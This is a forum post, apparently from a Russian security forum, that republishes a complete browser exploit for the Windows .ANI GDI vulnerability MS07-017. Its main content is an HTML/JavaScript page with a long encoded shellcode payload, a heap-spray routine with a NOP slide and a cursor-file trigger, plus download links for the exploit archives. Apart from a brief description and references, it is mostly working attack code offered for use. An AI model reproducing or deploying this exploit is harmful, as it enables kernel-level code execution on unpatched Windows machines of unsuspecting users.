30.04.2007, 11:05
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287
Репутация:
4738
|
|
Ms Windows (.ani) Gdi Remote Elevation Of Privilege Exploit (ms07-017)
Цель: Microsoft Windows
Воздействие: Выполнение произвольного кода
скачать эксплоит(архив)
Код:
<html>
<head>
<title>MS Windows (.ANI) GDI Remote Elevation of Privilege Exploit (MS07-017)</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
body {
SCROLLBAR-FACE-COLOR: #000000;
FONT-WEIGHT: normal;
SCROLLBAR-HIGHLIGHT-COLOR: #006600;
TEXT-TRANSFORM: none;
SCROLLBAR-SHADOW-COLOR: #000000;
COLOR: #339999;
SCROLLBAR-3DLIGHT-COLOR: #000000;
LINE-HEIGHT: normal;
SCROLLBAR-ARROW-COLOR: #ffffff;
SCROLLBAR-TRACK-COLOR: #000000;
FONT-STYLE: normal;
FONT-FAMILY: Fixedsys;
SCROLLBAR-DARKSHADOW-COLOR: #006600;
BACKGROUND-COLOR: #000000;
FONT-VARIANT: normal;
TEXT-DECORATION: none
}
a {
color: #33CC33;
text-decoration: none;
}
a:hover {
color: #00FFFF;
text-decoration: none;
}
-->
</style>
</head>
<body>
<p align='center'><font size='5'>MS Windows (.ANI) GDI Remote Elevation<br>
of Privilege Exploit (MS07-017)</font></p>
<p align='center'> </p>
<p align='left'><strong><font color="#00FFFF">Compatibility</font></strong><br>
All MS Windows 2000/XP before MS07-017 patch with IE 6 (and later ???).</p>
<p align='left'><strong><font color="#00FFFF">References</font></strong><br>
<a href='http://www.microsoft.com/technet/security/advisory/935423.mspx' target='_blank'>http://www.microsoft.com/technet/security/advisory/935423.mspx</a>
<br>
<a href="http://research.eeye.com/html/alerts/zeroday/20061106.html" target="_blank">http://research.eeye.com/html/alerts/zeroday/20061106.html</a>
<br>
<a href="http://www.milw0rm.com/exploits/3688" target="_blank">http://www.milw0rm.com/exploits/3688</a>
<br>
<a href="http://ivanlef0u.free.fr/?p=41" target="_blank">http://ivanlef0u.free.fr/?p=41</a>
</p>
<p align='left'><br>
Used technique for this exploit (C langage) :<br>
-> <a href="http://www.milw0rm.com/exploits/3755" target="_blank">http://www.milw0rm.com/exploits/3755
<br>
</a>The same but the code is updated :<br>
-> <a href="http://www.labo-asso.com/download/gdi_local_elevation_privilege_exploit_ms07_017.zip">http://www.labo-asso.com/download/gdi_local_elevation_privilege_exploit_ms07_017.zip</a></p>
<p align='left'>This exploit with source of payload (nasm) :<br>
<a href="http://www.labo-asso.com/download/gdi_remote_elevation_privilege_exploit_ms07_017.zip">http://www.labo-asso.com/download/gdi_remote_elevation_privilege_exploit_ms07_017.zip</a></p>
<p align='left'>Study (in French) :<br>
<a href="http://www.labo-asso.com/php/travaux/gdi_kernel_exploit.php" target="_blank">http://www.labo-asso.com/php/travaux/gdi_kernel_exploit.php</a></p>
<p align='left'> <strong><font color="#00FFFF">Patch</font></strong> <br>
<a href='http://www.microsoft.com/technet/security/Bulletin/MS07-017.mspx' target='_blank'>http://www.microsoft.com/technet/security/Bulletin/MS07-017.mspx</a>
</p>
<p><strong><font color="#00FFFF" size="4"><em>For educational only !</em></font></strong></p>
<p><font color="#00FFFF">if</font> (success) displays some kernel informations
with help a MessageBox; <br>
<font color="#00FFFF">else</font> alone knows...;</p>
<p>Coded by Lionel d'Hauenens <br>
bugs, comments,... : <a href='http://www.labo-asso.com' target='_blank'>http://www.labo-asso.com</a>
or <a href="http://www.labo-asso.com/forum" target="_blank">http://www.labo-asso.com/forum</a><br>
Avril 20, 2007</p>
</body>
</html>
<SCRIPT language="javascript">
var payLoadCode=unescape(
"%uE860%u0000%u0000%u815D%u06ED%u0000%u3100%u39C0%u9085%u0004" +
"%u0F00%uF185%u0002%uE800%u03A6%u0000%uC009%u840F%u02E4%u0000" +
"%uB5FF%u0514%u0000%uE850%u03C7%u0000%uC009%u840F%u02D0%u0000" +
"%uC789%uC031%u5450%u406A%uCB68%u0006%u8D00%u0085%u0000%u5000" +
"%uD7FF%u095B%u0FC0%uB184%u0002%u8900%u949D%u0004%uFF00%u9085" +
"%u0004%uE800%u0635%u0000%u9090%uE890%u0000%u0000%u815D%u74ED" +
"%u0000%uE800%u02E7%u0000%uC009%u840F%u0284%u0000%u95FF%u0500" +
"%u0000%u8589%u04A0%u0000%u95FF%u04FC%u0000%u8589%u04A8%u0000" +
"%u95FF%u04F0%u0000%u8589%u04A4%u0000%uB5FF%u04A4%u0000%u95FF" +
"%u04F4%u0000%u8589%u04AC%u0000%u858D%u04E4%u0000%uFF50%u5495" +
"%u0005%u0900%u0FC0%u0884%u0002%u8900%u9C85%u0004%u3100%u4FFF" +
"%u8147%uFFFF%u00FF%u0F00%uF287%u0001%u3100%u89C0%u2444%u5004" +
"%u5050%u1F68%u0F00%u5700%u95FF%u0504%u0000%uC009%uDA74%uC689" +
"%uDB31%u6A53%u8D10%uD485%u0004%u5000%u5753%u95FF%u0540%u0000" +
"%uBD81%u04D8%u0000%u0000%u0800%u3F75%u958B%u04A0%u0000%uB70F" +
"%u9C85%u0004%uC100%u04E0%uC389%uC383%u3B10%uDC9D%u0004%u7300" +
"%u0122%u8BF0%u9C9D%u0004%uC100%u10EB%u3B66%u0858%u1175%u7880" +
"%u080A%u0B75%u588B%u8304%uFEE3%u3966%u74D3%u560C%u95FF%u0508" +
"%u0000%u6DE9%uFFFF%u89FF%u98B5%u0004%u8900%uB885%u0004%u8B00" +
"%u8918%uB09D%u0004%u3100%u6AC0%u6804%u1000%u0000%u0068%u0010" +
"%u5000%u95FF%u050C%u0000%uC009%u840F%u013B%u0000%u8589%u04B4" +
"%u0000%u9D8B%u049C%u0000%u1889%u8B66%uE69D%u0004%u6600%u5889" +
"%u8D14%u119D%u0003%u8900%u3C58%u0F6A%uB5FF%u04A4%u0000%u95FF" +
"%u04F8%u0000%u858B%u04B4%u0000%uBD8B%u04B8%u0000%u0789%u3160" +
"%u50C0%uB5FF%u049C%u0000%u95FF%u0558%u0000%u8B61%uB085%u0004" +
"%u8900%uFF07%uACB5%u0004%uFF00%uA4B5%u0004%uFF00%uF895%u0004" +
"%uFF00%u98B5%u0004%uFF00%u0895%u0005%uFF00%u9CB5%u0004%uFF00" +
"%u5C95%u0005%u6800%u4000%u0000%u0068%u0010%uFF00%uB4B5%u0004" +
"%uFF00%u1095%u0005%u8D00%u1F85%u0006%u5000%uB5FF%u04BC%u0000" +
"%u1CE8%u0002%u8D00%u3585%u0006%u5000%uB5FF%u04C0%u0000%u0AE8" +
"%u0002%u8D00%u5F85%u0006%u5000%uB5FF%u04C4%u0000%uF8E8%u0001" +
"%u8D00%u7185%u0006%u5000%uB5FF%u04C8%u0000%uE6E8%u0001%u8D00" +
"%u8385%u0006%u5000%uB5FF%u04CC%u0000%uD4E8%u0001%u8D00%u9585" +
"%u0006%u5000%uB5FF%u04D0%u0000%uC2E8%u0001%u3100%u6AC0%u8D10" +
"%u689D%u0005%u5300%u9D8D%u0578%u0000%u5053%u95FF%u0528%u0000" +
"%uC031%u5450%uB5FF%u0494%u0000%uCB68%u0006%u8D00%u0085%u0000" +
"%u5000%u95FF%u0514%u0000%uC483%u8B04%u2C95%u0005%u8D00%u009A" +
"%u0001%u8900%uFCE6%u3B64%u0435%u0000%u7300%uAD19%uD039%uF276" +
"%uD839%uEE73%u468D%u89F8%u2444%u611C%uC489%u315D%uC2C0%u0018" +
"%uC031%uF0F7%uFACC%uE860%u0000%u0000%u815D%u18ED%u0003%u6600" +
"%uE08C%u8366%u30F8%u1575%uA164%u0124%u0000%u8589%u04C0%u0000" +
"%u408B%u8944%uBC85%u0004%u0F00%uC020%u8589%u04C4%u0000%u200F" +
"%u89D0%uC885%u0004%u0F00%uD820%u8589%u04CC%u0000%u200F%u89E0" +
"%uD085%u0004%u6100%uC031%uFB40%u60C3%u00E8%u0000%u5D00%uED81" +
"%u036D%u0000%uBD8D%u04EC%u0000%u47E8%u0000%u0900%u74C0%uFC3F" +
"%uC689%u3F83%u7400%uFF0F%u5637%u68E8%u0000%u0900%u74C0%uAB2B" +
"%uECEB%uC783%u8304%u003F%u1774%uF889%u5040%u95FF%u04EC%u0000" +
"%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD%u40C0%u4489%u1C24" +
"%uC361%uC031%uF6EB%u3152%u64C0%u008B%u108B%u7442%u8B04%uEB00" +
"%u8BF7%u0440%u0025%uFF00%u66FF%u3881%u5A4D%u0774%u002D%u0100" +
"%uEB00%u8BF2%u3C50%u3C81%u5010%u0045%u7400%u3102%u5AC0%u60C3" +
"%u448B%u2424%u4003%u8D3C%u1840%u408D%u8B60%u0938%u74FF%u0352" +
"%u247C%u8B24%u184F%u5F8B%u0320%u245C%uFC24%u7C49%u8B40%u8B34" +
"%u7403%u2424%uC031%uAC99%uC008%u0774%uC2C1%u0107%uEBC2%u3BF4" +
"%u2454%u7528%u8BE1%u2457%u5403%u2424%uB70F%u4A04%uE0C1%u8B02" +
"%u1C57%u5403%u2424%u048B%u0310%u2444%u8924%u2444%u611C%u08C2" +
"%u3100%uEBC0%u60F4%u548B%u2424%u7C8B%u2824%u08B9%u0000%uFD00" +
"%u7C8D%uFF0F%uD088%u0F24%u3004%u393C%u0276%u0704%uC1AA%u04EA" +
"%uEEE2%u61FC%u08C2%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
"%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
"%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
"%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
"%u0000%u0000%u0000%u0000%u0000%u0000%u0300%u0001%u0000%u0000" +
"%uFFC9%u10DF%u8FDB%u9876%u6B0B%u89D2%u6B0B%u89DE%uE60F%u0B08" +
"%uE7A6%u3983%u910E%uD782%u9266%u4982%u99C0%u9291%u9FA8%uBBC6" +
"%u12C8%u9711%u0000%u0000%u750C%u6573%u3372%u2E32%u6C64%u006C" +
"%u96F2%u4C43%u854C%u4BFD%u0000%u0000%u6E0C%u6474%u6C6C%u642E" +
"%u6C6C%u0000%u0491%uA8D8%u0000%u0000%u670C%u6964%u3233%u642E" +
"%u6C6C%u0000%uD6E4%uC5C6%u62C6%u582D%uA1E8%u934B%u0000%u0000" +
"%u0000%u0000%u6952%u676E%u2030%u6572%u6F70%u7472%u0000%u0000" +
"%u534D%u5720%u6E69%u6F64%u7377%u2820%u412E%u494E%u2029%u4447" +
"%u2049%u6552%u6F6D%u6574%u4520%u656C%u6176%u6974%u6E6F%u6F20" +
"%u2066%u7250%u7669%u6C69%u6765%u2065%u7845%u6C70%u696F%u2074" +
"%u4D28%u3053%u2D37%u3130%u2937%u0D0A%u6F43%u6564%u2064%u7962" +
"%u4C20%u6F69%u656E%u206C%u2764%u6148%u6575%u656E%u736E%u0D0A" +
"%u7468%u7074%u2F3A%u772F%u7777%u6C2E%u6261%u2D6F%u7361%u6F73" +
"%u632E%u6D6F%u0D0A%u0D0A%u6F46%u2072%u6465%u6375%u7461%u6F69" +
"%u616E%u206C%u6E6F%u796C%u2120%u0D0A%u0D0A%u504B%u4F52%u4543" +
"%u5353%u3A20%u3020%u3F78%u3F3F%u3F3F%u3F3F%u0A3F%u4B0D%u4854" +
"%u4552%u4441%u3A20%u3020%u3F78%u3F3F%u3F3F%u3F3F%u0A3F%u0A0D" +
"%u430D%u6E6F%u7274%u6C6F%u5220%u6765%u7369%u6574%u7372%u0A3A" +
"%u0A0D%u430D%u3052%u3A20%u3020%u3F78%u3F3F%u3F3F%u3F3F%u0A3F" +
"%u430D%u3252%u3A20%u3020%u3F78%u3F3F%u3F3F%u3F3F%u0A3F%u430D" +
"%u3352%u3A20%u3020%u3F78%u3F3F%u3F3F%u3F3F%u0A3F%u430D%u3452" +
"%u3A20%u3020%u3F78%u3F3F%u3F3F%u3F3F%u003F%u9090%u6090%u858D" +
"%u0000%u0000%uE083%u7403%uF718%u83D8%u04C0%u9EB9%u0006%u8D00" +
"%u0DB4%uFFFF%uFFFF%u3C8D%uFD06%uA4F3%u61FC%u0483%u0324%u90C3");
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return (spraySlide);
}
if (confirm ("This exploit execute code with kernel privilege.\n"
+"Do you want to take really this risk? :p"))
{
var SizeOfHeapEntry = 0x28;
var heapSprayToAddress = 0x04040404;
var payLoadSize = payLoadCode.length * 2;
var heapBlockSize = 0x400000;
var spraySlide = unescape("%u9090%u9090");
var spraySlideSize = heapBlockSize - (payLoadSize + SizeOfHeapEntry);
var heapBlocks = (heapSprayToAddress-01000000)/heapBlockSize;
var memory = new Array();
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}
document.write("<HTML><BODY><style>BODY{CURSOR: url('ani.htm')}</style></BODY></HTML>");
}
</SCRIPT>
|
|
|